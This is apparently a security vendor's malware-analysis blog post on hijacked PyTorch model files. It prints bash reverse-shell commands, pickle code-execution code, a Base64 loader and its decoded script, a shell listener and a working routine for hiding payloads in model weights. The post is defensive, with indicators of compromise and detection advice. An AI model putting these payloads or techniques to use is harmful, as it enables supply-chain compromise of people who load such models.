Over the past few months, HiddenLayer’s SAI team has investigated several machine learning models that were hijacked for illicit purposes, whether to conduct security evaluations or to evade detection.

Previously, we’ve written about how ransomware can be embedded and deployed from ML models, how pickle files are used to launch post-exploitation frameworks, and the potential for supply chain attacks. In this blog, we’ll perform a technical deep dive into some models we uncovered that deploy reverse shells and a pair of nested models that may be brewing up something nasty. We hope this analysis will provide insight to reverse engineers, incident responders, and forensic analysts to better prepare them to handle targeted ML attacks in future incidents. 

Ghost in the (Reverse) Shell

In November 2022, we discovered two small PyTorch/Zip models, each 57.53 KB in size and containing just two layers. Both had been uploaded to VirusTotal by the same submitter, purportedly from Taiwan, less than six minutes apart. The weights and biases differ between the models, but both share the same layer names, shapes, data types, and sizes.

Layer      Shape     Datatype  Size
l1.weight  (512, 5)  float64   20.5 kB
l1.bias    (512,)    float64   4.1 kB
l2.weight  (8, 512)  float64   32.8 kB
l2.bias    (8,)      float64   64 B
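
For reference, a table like this can be produced with a few lines of PyTorch. The following is a minimal sketch, assuming the file deserializes to a plain state_dict; remember that torch.load unpickles the file, which is exactly what triggers an embedded payload, so only ever run this against untrusted models inside an isolated sandbox:

# Enumerate tensor names, shapes, dtypes, and sizes from a saved state_dict.
# WARNING: torch.load unpickles the file - only do this in a sandboxed VM.
import torch

state_dict = torch.load("rs_dnn_dict.pt", map_location="cpu")
for name, tensor in state_dict.items():
    nbytes = tensor.element_size() * tensor.nelement()
    print(name, tuple(tensor.shape), tensor.dtype, f"{nbytes} bytes")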

As is typical for recent PyTorch/Zip-based models, each model contains a file named “archive/data.pkl”, a pickle-serialized structure that tells PyTorch how to reconstruct the tensors containing the weights and biases. As we’ve alluded to in past blogs, pickle data files can be leveraged to execute arbitrary code. In this instance, both pickle files were subverted to include a posix system call that spawns a reverse TCP bash shell on Linux/macOS operating systems.
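
To illustrate the underlying primitive, the sketch below (our own illustration, not the attackers’ injection method, which we return to later) shows how a pickle can be made to call posix.system during deserialization via Python’s __reduce__ hook:

# Minimal illustration of code execution via pickle's __reduce__ hook.
# Serializing this object records a GLOBAL 'posix system' reference followed
# by REDUCE, so simply loading the pickle runs the command (Linux/macOS).
import pickle
import posix

class Payload:
    def __reduce__(self):
        return (posix.system, ("echo pickle-borne code execution",))

blob = pickle.dumps(Payload(), protocol=2)
pickle.loads(blob)  # executes the command - never load untrusted pickles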

The data.pkl pickle files in both models were serialized using version 2 of the pickle protocol and are largely identical across both models, except for minor tweaks to the IP address used for the reverse shell.

SHA256: 2572cf69b8f75ef8106c5e6265a912f7898166e7215ebba8d8668744b6327824

The first model, submitted on 17 November 2022 at 08:27:21 UTC, contains the following command embedded into data.pkl:

/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/9001 0>&1 &'

This spawns an interactive bash shell and redirects its standard streams to a TCP connection to localhost on port 9001, via bash’s /dev/tcp pseudo-device.

SHA256: 19993c186674ef747f3b60efeee32562bdb3312c53a849d2ce514d9c9aa50d8a

The second model was submitted on the same day, nearly six minutes later at 08:33:00, and contains a slightly different command embedded into data.pkl:

/bin/bash -c '/bin/bash -i >& /dev/tcp/172.20.10.2/9001 0>&1 &'

This spawns the same shell, but connects to 172.20.10.2, an address in a private IP range, on port 9001.

The filename for both models is identical and quite descriptive: rs_dnn_dict.pt (reverse shell deep neural network dictionary dot pre-trained). Since the IP addresses for the reverse TCP shell sit in the localhost/private range, the attacker could be using a netcat listener or other tunneling software to proxy commands. These models were most likely used for red-teaming, but we cannot rule out their use as part of a targeted attack.
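
For context, catching such a callback requires nothing more than nc -lvnp 9001, or a few lines of Python; the following is a minimal stand-in for such a listener (our own illustration):

# Minimal reverse-shell catcher, roughly equivalent to "nc -lvnp 9001".
import socket

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 9001))
srv.listen(1)
conn, addr = srv.accept()          # blocks until the implant connects back
print(f"connection from {addr}")
conn.sendall(b"id\n")              # commands go to the remote bash's stdin
print(conn.recv(4096).decode())    # ...and its output comes back over TCP
conn.close()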

Disassembling the data.pkl files reveals something else of interest: the positioning of the system command within the data structure. Most off-the-shelf attack tooling (such as fickling) appends or prepends commands to an existing pickle file. In these models, however, the commands reside in the middle of the pickled data structure, suggesting that the attacker modified the PyTorch sources to create the malicious models rather than simply running an injection tool afterward. Across both samples, the system function from Python’s posix module (the GLOBAL ‘posix system’ reference) is used to spawn the bash shell, as demonstrated in the disassembly below:

374: q BINPUT 36
376: R REDUCE
377: q BINPUT 37
379: X BINUNICODE 'ignore'
390: q BINPUT 38
392: c GLOBAL 'posix system'
406: q BINPUT 39
408: X BINUNICODE "/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/9001 0>&1 &'"
474: q BINPUT 40
476: \x85 TUPLE1
477: q BINPUT 41
479: R REDUCE
480: q BINPUT 42
482: u SETITEMS (MARK at 33)
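
Incidentally, the disassembly above comes straight from Python’s standard pickletools module, which parses opcodes without executing them; it can be reproduced against any PyTorch/Zip model along these lines:

# Safely disassemble the pickle inside a PyTorch/Zip model.
# pickletools.dis only parses opcodes - nothing is deserialized or executed.
import pickletools
import zipfile

with zipfile.ZipFile("rs_dnn_dict.pt") as zf:
    pickletools.dis(zf.read("archive/data.pkl"))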

PyTorch with a Sophisticated SimpleNet Payload

If you thought reverse shells were bad, we also came across something more intricate, and more interesting: a PyTorch machine learning model on VirusTotal that contains a multi-stage Python-based payload. The model was submitted very recently, on 4 February 2023 at 08:29:18 UTC, purportedly by a user in Singapore.

By comparing the VirusTotal upload time with a compile timestamp embedded in the final stage payload, we noticed that the sample was uploaded approximately 30 minutes after it was first created. Based on this information, we can postulate that this model was likely developed by a researcher or adversary who was testing anti-virus detection efficacy for this delivery mechanism/attack vector.

SHA256:  80e9e37bf7913f7bcf5338beba5d6b72d5066f05abd4b0f7e15c5e977a9175c2

The model file for this attack, named model.pt, is 1.66 MB (1,747,607 bytes) in size and saved as a legacy PyTorch pickle, serialized using version 4 of the pickle protocol (whereas newer PyTorch models use Zip files for storage). Disassembling the model’s pickled data reveals the following opcodes:

0: \x80 PROTO 4
2: \x95 FRAME 1572
11: \x8c SHORT_BINUNICODE 'builtins'
21: \x94 MEMOIZE (as 0)
22: \x8c SHORT_BINUNICODE 'exec'
28: \x94 MEMOIZE (as 1)
29: \x93 STACK_GLOBAL
30: \x94 MEMOIZE (as 2)
31: X BINUNICODE "import base64\nexec(base64.b64decode('aW1wb3J0IHRvcmNoCmZyb20gaW8gaW1wb3J0IEJ5dGVzSU8KaW1wb3J0IHN1YnByb2Nlc3MKCmRlZiBmKHcsIG4pOgogICAgaW1wb3J0IG51bXB5IGFzIG5wCiAgICBtZmIgID0gbnAuYXNhcnJheShbMV0gKiA4ICsgWzBdICogMjQsIGR0eXBlPWJvb2wpCiAgICBtbGIgPSB+bWZiCgogICAgZGVmIF9iaXRfZXh0KGVtYl9hcnIsIHNlcV9sZW4sIGNodW5rX3NpemUsIG1hc2spOgogICAgICAgIGJ5dGVfYXJyID0gbnAuZnJvbWJ1ZmZlcihlbWJfYXJyLCBkdHlwZT1ucC51aW50MzIpCiAgICAgICAgc2l6ZSA9IGludChucC5jZWlsKHNlcV9sZW4gKiA4IC8gY2h1bmtfc2l6ZSkpCiAgICAgICAgcHJvY2Vzc19ieXRlcyA9IG5wLnJlc2hhcGUobnAudW5wYWNrYml0cyhucC5mbGlwKG5wLmZyb21idWZmZXIoYnl0ZV9hcnJbOnNpemVdLCBkdHlwZT1ucC51aW50OCkpKSwgKHNpemUsIDMyKSkKICAgICAgICByZXN1bHQgPSBucC5wYWNrYml0cyhucC5mbGlwKHByb2Nlc3NfYnl0ZXNbOiwgbWFza10pWzo6LTFdLmZsYXR0ZW4oKSwgYml0b3JkZXI9ImxpdHRsZSIpWzo6LTFdCiAgICAgICAgcmV0dXJuIHJlc3VsdC5hc3R5cGUobnAudWludDgpWy1zZXFfbGVuOl0udG9ieXRlcygpCgogICAgcmV0dXJuIF9iaXRfZXh0KHcsIG4sIG5wLmNvdW50X25vbnplcm8obWxiKSwgbWxiKQoKd2l0aCBvcGVuKCdtb2RlbC5wdCcsICdyYicpIGFzIGZpbGU6CiAgICBmaWxlLnNlZWsoLTE3NDYwMjQsIDIpCiAgICBkYXRhID0gQnl0ZXNJTyhmaWxlLnJlYWQoKSkKCm1vZGVsID0gdG9yY2gubG9hZChkYXRhKQoKZm9yIGksIGxheWVyIGluIGVudW1lcmF0ZShtb2RlbC5tb2R1bGVzKCkpOgogICAgaWYgaGFzYXR0cihsYXllciwgJ3dlaWdodCcpOgogICAgICAgIGlmIGkgPT0gNzoKICAgICAgICAgICAgY29udGFpbmVyX2xheWVyID0gbGF5ZXIKCmNvbnRhaW5lciA9IGNvbnRhaW5lcl9sYXllci53ZWlnaHQuZGV0YWNoKCkubnVtcHkoKQpkYXRhID0gZihjb250YWluZXIsIDM3OCkKCndpdGggb3BlbignZXh0cmFjdC5weWMnLCAnd2InKSBhcyBmaWxlOgogICAgZmlsZS53cml0ZShkYXRhKQoKc3VicHJvY2Vzcy5Qb3BlbigncHl0aG9uIGV4dHJhY3QucHljJywgc2hlbGw9VHJ1ZSk=').decode('utf-8'))\n"
1577: \x94 MEMOIZE (as 3)
1578: \x85 TUPLE1
1579: \x94 MEMOIZE (as 4)
1580: R REDUCE
1581: \x94 MEMOIZE (as 5)
1582: 0 POP
1583: \x80 PROTO 2
1585: \x8a LONG1 119547037146038801333356
1597: . STOP

When the model is loaded, unpickling triggers Python’s built-in “exec” function, which is used to decode and execute a Base64-encoded payload. Decoding the Base64 yields a small Python script:

import torch
from io import BytesIO
import subprocess


def f(w, n):
    import numpy as np
    mfb  = np.asarray([1] * 8 + [0] * 24, dtype=bool)
    mlb = ~mfb


    def _bit_ext(emb_arr, seq_len, chunk_size, mask):
        byte_arr = np.frombuffer(emb_arr, dtype=np.uint32)
        size = int(np.ceil(seq_len * 8 / chunk_size))
        process_bytes = np.reshape(np.unpackbits(np.flip(np.frombuffer(byte_arr[:size], dtype=np.uint8))), (size, 32))
        result = np.packbits(np.flip(process_bytes[:, mask])[::-1].flatten(), bitorder="little")[::-1]
        return result.astype(np.uint8)[-seq_len:].tobytes()


    return _bit_ext(w, n, np.count_nonzero(mlb), mlb)


with open('model.pt', 'rb') as file:
    file.seek(-1746024, 2)
    data = BytesIO(file.read())


model = torch.load(data)


for i, layer in enumerate(model.modules()):
    if hasattr(layer, 'weight'):
        if i == 7:
            container_layer = layer


container = container_layer.weight.detach().numpy()
data = f(container, 378)


with open('extract.pyc', 'wb') as file:
    file.write(data)


subprocess.Popen('python extract.pyc', shell=True)

This payload is a simple second-stage loader: it opens the model.pt file on disk, seeks back to a fixed offset from the end of the file, and reads the remainder into memory. Intriguingly, when viewed in a hex editor, this trailing data contains another PyTorch model, serialized using version 2 of the pickle protocol (another legacy PyTorch model) and constructed using the “SimpleNet” neural network architecture.
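
This append-and-seek trick works because unpickling stops at the first STOP opcode, so any bytes after it ride along inert inside the file. A minimal sketch of the same carrier layout (hypothetical filename and stand-in data):

# Sketch of the carrier layout: a loader pickle with a blob appended after
# its STOP opcode. The blob is ignored at load time and recovered later by
# seeking backwards from the end of the file, as the payload script does.
import pickle

blob = b"stand-in for the nested SimpleNet model"
with open("demo.pt", "wb") as f:
    f.write(pickle.dumps({"stage": "loader"}))
    f.write(blob)

with open("demo.pt", "rb") as f:
    print(pickle.load(f))     # loads the first pickle, stops at STOP
    f.seek(-len(blob), 2)     # cf. file.seek(-1746024, 2) in the payload
    print(f.read())           # recovers the appended blob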

There are also some helpful strings leaked in the model, revealing the filesystem location where the original files were stored and indicating that the author was trying to create a “deep steganography” payload (and, moreover, uses the PyCharm editor on an Ubuntu system with the Anaconda Python distribution!):

  • /home/ubuntu/Documents/Pycharm Projects/Torch-Pickle-Codes-main/gen-test/simplenet.py
  • /home/ubuntu/anaconda3/envs/deep-stego/lib/python3.10/site-packages/torch/nn/modules/conv.py
  • /home/ubuntu/anaconda3/envs/deep-stego/lib/python3.10/site-packages/torch/nn/modules/activation.py
  • /home/ubuntu/anaconda3/envs/deep-stego/lib/python3.10/site-packages/torch/nn/modules/pooling.py
  • /home/ubuntu/anaconda3/envs/deep-stego/lib/python3.10/site-packages/torch/nn/modules/linear.py

Next, the payload script loads the Torch model from the in-memory data and enumerates the modules of the neural network to locate the weights of the 7th layer, from which the final stage payload is extracted. The payload is decoded from the layer’s weights by the _bit_ext function, which reinterprets each 32-bit weight as an integer, extracts its lower 24 bits (where the payload bits were hidden, leaving the sign and high-order exponent bits of each float untouched, so every weight keeps its sign and coarse magnitude), and reassembles the recovered bits into bytes. Finally, the resulting payload is written to a file called extract.pyc and executed using subprocess.Popen.
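
To make the weight steganography concrete, here is a simplified round-trip reimplementation of the idea (our own, without the attacker’s exact bit-order gymnastics): stash payload bits in the lower 24 bits of each float32 weight, then recover them with a 24-bit mask like mlb above:

# Simplified LSB-style weight steganography: hide bytes in the lower 24 bits
# of each float32 weight. The sign and high exponent bits are preserved, so
# each weight keeps its sign and coarse magnitude.
import numpy as np

def embed(weights, payload):
    w = weights.view(np.uint32).copy()
    bits = np.unpackbits(np.frombuffer(payload, dtype=np.uint8))
    bits = np.pad(bits, (0, -len(bits) % 24)).reshape(-1, 24)
    vals = np.zeros(len(bits), dtype=np.uint32)
    for col in range(24):                      # pack 24 bits per weight, MSB first
        vals = (vals << 1) | bits[:, col]
    w[: len(vals)] = (w[: len(vals)] & 0xFF000000) | vals
    return w.view(np.float32)

def extract(weights, n_bytes):
    vals = weights.view(np.uint32)
    bits = [(int(v) >> s) & 1 for v in vals for s in range(23, -1, -1)]
    return np.packbits(np.array(bits, dtype=np.uint8))[:n_bytes].tobytes()

weights = np.random.rand(16).astype(np.float32)
assert extract(embed(weights, b"payload"), 7) == b"payload"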

The final stage payload is a Python 3.10.0 compiled script, 356 bytes in size. The original filename of the script was “benign.py,” and it was compiled on 2023-02-04 at 07:58:46 (this is the compile timestamp we referenced earlier when comparing with the VT upload time). Compiled Python 3.10 code is a bit of a fiddle to disassemble, but the original code was roughly as follows:

import subprocess
processes = ['notify-send "HELLO!!!!!!" "Your file is compromised"'] + ["zenity --error --text='An error occurred\! Your pc is compromised :) Check your files properly next time :O'"]
for process in processes:
    subprocess.Popen(process, shell=True)

When run, the script spawns the “notify-send” and “zenity” Linux commands to alert the user with desktop notifications. However, the attacker could easily swap the script for something less benign in the future.
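
Both the compile timestamp and the original filename can be pulled straight out of the .pyc; a minimal sketch, assuming the Python 3.7+ header layout and a matching 3.10 interpreter for marshal:

# Parse a Python 3.7+ .pyc: a 16-byte header (magic, flags, source mtime,
# source size) followed by a marshalled code object. marshal.loads must be
# run under the same minor version (3.10) that compiled the file.
import marshal
import struct
from datetime import datetime, timezone

with open("extract.pyc", "rb") as f:
    magic, flags, mtime, size = struct.unpack("<4sIII", f.read(16))
    code = marshal.loads(f.read())

print("compiled:", datetime.fromtimestamp(mtime, tz=timezone.utc))
print("source:  ", code.co_filename)  # reveals the original "benign.py" path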

Conclusions

Don’t be the victim of a supply chain attack: if you source your models externally, whether from third-party providers or model hubs, verify that what you’re getting hasn’t been hijacked. The same goes if you provide your models to others; the only thing worse than being on the receiving end of a supply chain attack is being the supplier!
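
A lightweight first-pass check you can run yourself (a heuristic sketch only, not a substitute for a dedicated scanner) is to enumerate the imports a model’s pickle would perform and flag modules that have no business in a weights file:

# Heuristic pre-load triage: list every import a pickle would perform.
# pickletools.genops parses opcodes without executing anything; the last
# two string opcodes before a STACK_GLOBAL approximate its module/name pair.
import pickletools

SUSPICIOUS = {"os", "posix", "nt", "subprocess", "builtins", "socket"}

def pickled_imports(data):
    strings = []
    for op, arg, pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            yield pos, arg.split()[0], arg
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            yield pos, strings[-2], f"{strings[-2]} {strings[-1]}"
        elif "UNICODE" in op.name or "STRING" in op.name:
            strings.append(arg)

with open("archive/data.pkl", "rb") as f:   # data.pkl from the unzipped model
    for pos, module, ref in pickled_imports(f.read()):
        flag = "  <-- suspicious" if module in SUSPICIOUS else ""
        print(f"offset {pos}: {ref}{flag}")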

Models are often privy to highly sensitive data, be it your competitive advantage in your field or your consumers’ personal information. Ensure that you enforce controls around the deployment of machine learning models and the systems that support them. We recently demonstrated how trivial it is to steal data from S3 buckets when a hijacked model is deployed.

What’s significant about these malicious files is that each had zero detections from any vendor on VirusTotal, which reaffirms a troubling lack of scrutiny around the problem of code execution through model binaries. Python payloads, especially pickle-serialized data that executes code and pre-compiled Python scripts, are also often poorly detected by security solutions and are becoming an appealing choice for targeted attacks, as we’ve seen with the Mythic/Medusa red-teaming framework.

HiddenLayer’s Model Scanner detects all of the models mentioned in this blog.


The more we look, the more we find. As ML becomes the zeitgeist of the decade, it’s evident that we’ll see ever more threats assailing these systems and those that support them.

Indicators of Compromise

Indicator Type Description
2572cf69b8f75ef8106c5e6265a912f7898166e7215ebba8d8668744b6327824 SHA256 rs_dnn_dict.pt spawning bash shell redirecting output to 127.0.0.1
19993c186674ef747f3b60efeee32562bdb3312c53a849d2ce514d9c9aa50d8a SHA256 rs_dnn_dict.pt spawning bash shell redirecting output to 172.20.10.2
rs_dnn_dict.pt Filename Filename for both reverse shell models
/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/9001 0>&1 &' Command-line Reverse shell command from 2572cf…7824
/bin/bash -c '/bin/bash -i >& /dev/tcp/172.20.10.2/9001 0>&1 &' Command-line Reverse shell command from 19993c…0d8a
80e9e37bf7913f7bcf5338beba5d6b72d5066f05abd4b0f7e15c5e977a9175c2 SHA256 Hijacked SimpleNet model
model.pt Filename Filename for the SimpleNet model
extract.pyc Filename Final stage payload for the SimpleNet model
780c4e6ea4b68ae9d944225332a7efca88509dbad3c692b5461c0c6be6bf8646 SHA256 extract.pyc final payload from the SimpleNet model

MITRE ATLAS/ATT&CK Mapping

Technique ID MITRE Framework Technique Name
AML.T0011.000 ATLAS User Execution: Unsafe ML Artifacts
AML.T0010.003 ATLAS ML Supply Chain Compromise: Model
T1059.004 ATT&CK Command and Scripting Interpreter: Unix Shell
T1059.006 ATT&CK Command and Scripting Interpreter: Python
T1090.001 ATT&CK Proxy: Internal Proxy